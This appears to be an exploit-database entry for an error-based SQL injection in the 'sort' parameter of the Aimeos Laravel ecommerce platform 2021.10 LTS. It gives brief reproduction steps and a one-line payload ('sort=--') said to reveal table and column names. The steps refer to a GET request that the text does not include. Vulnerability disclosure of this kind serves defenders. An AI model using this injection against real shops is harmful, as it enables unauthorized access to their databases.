Exploits / Vulnerability Discovered : 2021-11-22 |
Type : webapps |
Platform : php
This exploit / vulnerability Aimeos laravel ecommerce platform 2021.10 lts sort sql injection is for educational purposes only and if it is used you will do on your own risk!
The "sort" parameter is vulnerable to SQL injection, reveals table and column names.
step 1 : Copy json api GET request above.
step 2 : Change sort parameter value to --
----------------------------------------------------------------------
Parameter: sort (GET)
Type: error based
Title: GET parameter 'sort' appears to be injectable
Payload: sort=--